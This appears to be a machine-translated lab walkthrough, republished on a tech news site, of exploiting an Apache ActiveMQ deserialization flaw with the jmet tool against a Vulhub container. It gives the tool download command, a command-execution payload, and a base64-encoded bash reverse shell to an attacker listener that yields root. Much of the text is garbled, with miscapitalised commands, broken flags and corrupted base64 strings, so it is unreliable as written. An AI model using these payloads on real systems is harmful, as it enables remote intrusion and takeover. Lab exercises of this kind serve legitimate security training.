Case Analysis of arbitrary Command execution vulnerability in ActiveMQ deserialization 01/17 Update SLTechnology News&Howtos

Case Analysis of arbitrary Command execution vulnerability in ActiveMQ deserialization

2025-01-17 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

This article shows you an example analysis of ActiveMQ deserialization of arbitrary command execution vulnerabilities, which is concise and easy to understand, which will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Preface

A security vulnerability exists in version 5.x of Apache ActiveMQ prior to 5.13.0, which stems from the fact that the program does not limit the classes that can be serialized in the agent. Remote attackers can exploit this vulnerability to execute arbitrary code via a specially crafted serialized Java message Service (JMS) ObjectMessage object.

Utilization

Environment building: https://vulhub.org/#/docs/

Tool download:

Wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

Kali: 192.168.110.208

Vulhub vulnerability environment: 192.168.110.213

First go to the jmet installation directory where I install it under / opt

Create a file remotely:

Java-jar jmet-0.1.0-all.jar-Q event-I ActiveMQ-s-Y "touch / tmp/wys"-Yp ROME 192.168.110.213 61616

A queue called events is added to the target's ActiveMQ, and we can see all the messages in this queue through http://192.168.110.213:8161/admin/browse.jsp?JMSDestination=event:

Click to view the corresponding id message to trigger the execution of the command

Enter the container at this time

Docker-compose exec activemq bash

Find the created file

Kali play shell:

Encode bash-I > & / dev/tcp/192.168.110.208/8888 0 > & 1 base64 to get

YmFzaCAtaSA+JiAvZGV2L3RjcC8xO.yMDgvODg4OCAwPiYxCg==

Payload is as follows:

Java-jar jmet-0.1.0-all.jar-Q event-I ActiveMQ-s-Y "bash-c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8x.MDgvODg4OCAwPiYxCg==} | {base64,-d} | {bash,-i}"-Yp ROME 192.168.110.213 61616

Kali snooping is successful. Get root permission.

The above is an example analysis of ActiveMQ deserialization of arbitrary command execution vulnerabilities. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.